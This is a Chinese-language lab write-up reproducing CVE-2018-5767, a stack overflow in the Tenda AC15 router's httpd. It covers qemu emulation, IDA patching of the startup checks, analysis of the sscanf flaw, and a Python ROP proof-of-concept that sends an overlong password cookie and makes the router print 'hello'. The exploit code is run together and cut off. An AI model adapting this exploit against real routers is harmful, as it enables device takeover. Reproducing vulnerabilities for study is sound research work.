Tenda AC15 路由器存在一個溢出漏洞, 由于沒有對用戶的輸入進行限制,導致sscanf函數直接將用戶的輸入直接拷貝至棧上,從而造成了棧溢出漏洞。
Tenda AC15
https://github.com/VulnTotal-Team/IoT-vulhub/tree/master/Tenda/CVE-2018-5767/firmware
sudo apt install qemu-user-static
cp $(which qemu-arm-static) ./sudo chroot . ./qemu-arm-static ./bin/httpd
卡在啟動界面,將./bin/httpd放入IDA中,通過IDA搜索”WeLoveLinux”發現以下結果
點擊F5查看代碼,通過查詢資料發現此處存在兩個檢查,第一個檢查check_network檢查network,未通過則進入睡眠狀態,第二個檢查ConnectCfm檢查連接狀態,未通過則輸出connect cfm failed!,所以如果想路由器固件http正常啟動,需對這2處的返回值進行patch繞過,否則將一直循環在啟動界面。本次漏洞環境搭建過程使用IDA插件keypatch進行patch,IDA插件keypatch下載地址:https://github.com/keystone-engine/keypatch,下載后,將keypatch.py拷貝至IDA的plugins目錄即可重新啟動IDA,將check_network和ConnectCfm的MOV R3, R0修改為MOV R3, #1點擊Edit->Patch program->Apply patches to,即可讓更改的patch生效將更改后的httpd替換之前的httpd文件并賦予新的httpd文件執行權限
sudo chroot . ./qemu-arm-static ./bin/httpd
命令執行完畢后執行ifconfig,可以看到br0網卡已被添加
chroot . ./qemu-arm-static ./bin/httpd
訪問http://192.168.1.1,發現仍然出現錯誤執行以下命令將/webroot_ro/目錄下文件拷貝到/webroot/
cp -rf ./webroot_ro/* ./webroot/
chroot . ./qemu-arm-static ./bin/httpd
根據已有POC可知溢出漏洞點位于R7WebsSecurityHandler函數中,通過IDA定位該函數并查看函數內容
該函數中漏洞點位于下圖所示位置,下圖所示代碼含義為首先尋找到”password=”字符串位置,之后通過函數sscanf獲取字符串”password=”以及之后的內容中的字符=到字符;中間的字符串即password的值,之后將截取到的內容寫入v33,由于v33已定義長度為128,當截取的值長度超過128時,將造成溢出
將下面代碼保存為CVE-2018-5767.py
import structimport requestsfrom pwn import * ip = "192.168.1.1" url = "http://{:s}/goform/exeCommand".format(ip)headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding': 'gzip, deflate','Connection': 'close','Upgrade-Insecure-Requests': '1','Cookie': 'password="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSKYEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.gifbbbbzzzz"','Cache-Control': 'max-age=0'} libc=0xFF5D5000 _str = "Hello\x00" pop_r3_pc = p32(0x00018298+libc)#pop r3 pcmov_r0_sp_blx_r3 = p32(0x00040cb8 + libc)# mov r0 sp; blx r3print(0x00018298+libc)puts = p32(0x035CD4+libc)_str = _str.encode()# 'byte'password = b"A" * 448+pop_r3_pc+puts+mov_r0_sp_blx_r3+_str+b".gif"headers['Cookie']=b"password="+password try: response = requests.get(url,headers=headers,timeout=1)except:Pas
另開一個cmd窗口,執行python3 CVE-2018-5767.py
路由器日志信息輸出hello
浙公網安備 33010502006954號 
